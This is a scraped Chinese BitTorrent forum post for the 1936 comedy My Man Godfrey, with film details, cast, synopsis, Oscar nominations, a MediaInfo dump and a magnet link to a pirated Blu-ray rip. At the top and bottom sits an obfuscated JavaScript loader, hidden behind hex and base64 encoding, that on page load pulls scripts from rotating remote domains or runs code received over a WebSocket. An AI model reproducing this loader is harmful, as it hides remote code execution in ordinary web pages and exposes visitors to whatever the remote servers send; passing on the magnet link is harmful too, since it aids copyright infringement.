我的戈弗雷[简繁字幕].My.Man.Godfrey.1936.CC.BluRay.1080p.DTS-HD.MA.1.0.x265.10bit 9.61GB

版主小s 25天前 106

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 我的戈弗雷 / 我的高德弗里 / 妙管家

◎片 名 My Man Godfrey

◎年 代 1936

◎产 地 美国

◎类 别 喜剧 / 爱情

◎语 言 英语

◎上映日期 1936-09-17

◎IMDb链接 https://www.imdb.com/title/tt0028010/

◎豆瓣评分 7.6/10 (968人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300241/

◎片 长 94分钟

◎导 演 格雷戈里·拉·卡瓦 Gregory La Cava (id:1032763)

◎编 剧 莫里·里斯金德 Morrie Ryskind (id:1029151)

埃里克·哈奇 Eric Hatch (id:1042316)

罗伯特·普雷纳尔 Robert Presnell Sr. (id:1046619)

格雷戈里·拉·卡瓦 Gregory La Cava (id:1032763)

◎演 员 威廉·鲍威尔 William Powell (id:1055463)

卡洛·朗白 Carole Lombard (id:1027901)

艾丽丝·布雷迪 Alice Brady (id:1041487)

吉尔·帕特里克 Gail Patrick (id:1019245)

尤金·佩里特 Eugene Pallette (id:1054238)

阿兰·莫布雷 Alan Mowbray (id:1130300)

富兰克林·潘伯恩 Franklin Pangborn (id:1133392)

Arthur Wanzer Arthur Wanzer (id:1167769)

鲍勃·佩里 Bob Perry (id:1128839)

Ethelreda Leopold Ethelreda Leopold (id:1121267)

Robert Light Robert Light (id:1119294)

Richard Kipling Richard Kipling (id:1111899)

路易·纳托 Louis Natheaux (id:1134616)

Albert Petit Albert Petit (id:1135086)

伯特·穆尔豪斯 Bert Moorhouse (id:1135738)

Katherine Perry Katherine Perry (id:1131770)

琼·罗杰斯 Jean Rogers (id:1142604)

William Wagner William Wagner (id:1169009)

Arthur Singley Arthur Singley (id:1159608)

格雷迪·萨顿 Grady Sutton (id:1160360)

Harley Wood Harley Wood (id:1161276)

塞尔默杰克逊 Selmer Jackson (id:1104629)

Carlton Griffin Carlton Griffin (id:1101404)

Reginald Mason Reginald Mason (id:1011821)

米沙·奥尔 Mischa Auer (id:1041569)

厄尼·亚当斯 Ernie Adams (id:1059150)

Jack Chefe Jack Chefe (id:1068367)

Phyllis Crane Phyllis Crane (id:1073943)

詹姆斯·弗莱文 James Flavin (id:1079423)

帕特·弗莱厄蒂 Pat Flaherty (id:1082331)

简·迪克森 Jean Dixon (id:1084267)

贝丝·弗劳尔斯 Bess Flowers (id:1084601)

埃迪·凡特思顿 Eddie Fetherston (id:1090011)

David Horsley David Horsley (id:1095018)

Edward Gargan Edward Gargan (id:1100252)

简·怀曼 Jane Wyman (id:1013918)

Charles R. Rogers Charles R. Rogers (id:1137726)

格雷戈里·拉·卡瓦 Gregory La Cava (id:1032763)

查尔斯·普雷温 Charles Previn (id:1015058)

Rudy Schrager Rudy Schrager (id:1052415)

泰德·泰兹拉夫 Ted Tetzlaff (id:1019600)

泰德·J·肯特 Ted J. Kent (id:1029686)

Russell F. Schoengarth Russell F. Schoengarth (id:1021357)

查尔斯·D·霍尔 Charles D. Hall (id:1003675)

Brymer Brymer (id:1040158)

◎标 签 美国 / 喜剧 / 1930s / 1936 / 美国电影 / 爱情 / CC / 格雷戈里·拉·卡瓦

◎简 介

《我的高德弗里》由一处破败的垃圾场开始,尖锐地嘲笑了贵族们无聊透顶的“狩猎”游戏,同时也把平民化的男主角高非里带进了一个有趣但完全颓废的布尔乔亚家庭。那里充满了对立,姐姐厌恶他,想方设法地陷害他;而妹妹善良正直,偏偏对这位穷管家心有独衷。其实这位管家毕业于名牌高校,他用主人家的钱偷偷投资,最终使得这个家庭免于破产,并且为流浪汉修建了一个“垃圾场”俱乐部。当然,美人入怀也是必不可少的。男主角威廉·鲍威尔仪态儒雅,凭借侦探喜剧《瘦人》系列蜚声好莱坞;妹妹扮演者卡罗尔·隆巴德更是美国少有的天才喜剧演员,她嫁给盖博,并于1942年出演了刘别谦的反战名作《生死问题》。可惜,该片尚未公映,隆巴德不幸在拉斯维加斯坠机身亡。

◎获奖情况 (共6项)

第9届奥斯卡金像奖 (1937)

最佳导演(提名)

└──格雷戈里·拉·卡瓦 (id:1032763)

最佳男主角(提名)

└──威廉·鲍威尔 (id:1055463)

最佳女主角(提名)

└──卡洛·朗白 (id:1027901)

最佳男配角(提名)

└──米沙·奥尔 (id:1041569)

最佳女配角(提名)

└──艾丽丝·布雷迪 (id:1041487)

最佳编剧(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 291996813543800513377883105800808903588 (0xDBAC8A6A76051DC78767AEED1D3133A4)

  4. Complete name : My.[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.61 GiB

  8. Duration : 1 h 33 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.7 Mb/s

  11. Encoded date : UTC 2021-11-08 06:15:46

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 33 min

  21. Bit rate : 13.8 Mb/s

  22. Width : 1 440 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 4:3

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.369

  31. Stream size : 8.99 GiB (93%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 13756 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1440x1080 / interlace=0 / total-frames=134520 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=20.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 33 min

  49. Bit rate mode : Variable

  50. Bit rate : 779 kb/s

  51. Channel(s) : 1 channel

  52. Channel layout : C

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 521 MiB (5%)

  58. Title : English DTS-HD Master Audio 1.0 @ 780 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 31 min

  68. Bit rate : 103 kb/s

  69. Count of elements : 3535

  70. Stream size : 67.5 MiB (1%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 31 min

  81. Bit rate : 38.6 kb/s

  82. Count of elements : 3256

  83. Stream size : 25.2 MiB (0%)

  84. Title : Chs/SUP 简体

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 31 min

  94. Bit rate : 39.8 kb/s

  95. Count of elements : 3256

  96. Stream size : 26.0 MiB (0%)

  97. Title : Cht/SUP 繁体

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Menu

  102. 00:00:00.000 : en:第 01 章

  103. 00:01:38.098 : en:第 02 章

  104. 00:06:44.529 : en:第 03 章

  105. 00:11:57.175 : en:第 04 章

  106. 00:14:59.524 : en:第 05 章

  107. 00:21:32.666 : en:第 06 章

  108. 00:25:59.767 : en:第 07 章

  109. 00:31:29.679 : en:第 08 章

  110. 00:36:18.760 : en:第 09 章

  111. 00:39:09.013 : en:第 10 章

  112. 00:42:15.575 : en:第 11 章

  113. 00:49:41.145 : en:第 12 章

  114. 00:51:04.645 : en:第 13 章

  115. 00:55:52.474 : en:第 14 章

  116. 00:58:08.318 : en:第 15 章

  117. 01:00:45.225 : en:第 16 章

  118. 01:07:36.844 : en:第 17 章

  119. 01:10:19.132 : en:第 18 章

  120. 01:12:44.944 : en:第 19 章

  121. 01:17:14.004 : en:第 20 章

  122. 01:21:41.897 : en:第 21 章

  123. 01:26:43.281 : en:第 22 章

  124. 01:27:51.308 : en:第 23 章




复制代码


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:B4A863EAA0EADC679F78B1370E0BFC2ABD1A57BD

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};